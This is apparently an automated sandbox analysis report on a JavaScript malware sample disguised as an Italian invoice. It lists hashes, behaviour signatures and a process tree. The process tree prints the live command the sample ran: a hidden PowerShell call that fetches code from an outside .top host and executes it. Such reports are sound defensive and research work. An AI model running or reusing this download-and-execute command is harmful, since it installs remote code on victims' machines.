Analysis
-
max time kernel
120s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20241010-it -
resource tags
arch:x64arch:x86image:win7-20241010-itlocale:it-itos:windows7-x64systemwindows -
submitted
20-01-2025 09:18
Static task
static1
Behavioral task
behavioral1
Sample
Fattura10415048.js
Resource
win7-20241010-it
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
Fattura10415048.js
Resource
win10v2004-20241007-it
9 signatures
150 seconds
General
-
Target
Fattura10415048.js
-
Size
692KB
-
MD5
5edb1e3c82853d7542e85bc9f336dce3
-
SHA1
1d3c891ecaa3d83477d9497b5db5bc390617b6e0
-
SHA256
ebdd0c6f2ecf449623ba004d2a4535daec49a480d7b12b37749fb7fc09f84079
-
SHA512
8783180ccaccf8f3a6dc2bd0d84786496af28dbad5e99a7cb940c7cb3ef8a2cd37977e795e4a1134a3bb3a686cf904363af53f4fb38db6485329ce99c12df3ce
-
SSDEEP
768:TbpQ4zpRpZabpQ4zpRpsDalEpQ4zpRSDakDa3a+DarpQ4zpRFpQ4zpRKpQ4zpRcw:1
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2852 powershell.exe -
Deletes itself 1 IoCs
pid Process 1504 wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2852 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2852 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1504 wrote to memory of 2852 1504 wscript.exe 31 PID 1504 wrote to memory of 2852 1504 wscript.exe 31 PID 1504 wrote to memory of 2852 1504 wscript.exe 31
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Fattura10415048.js1⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2852
-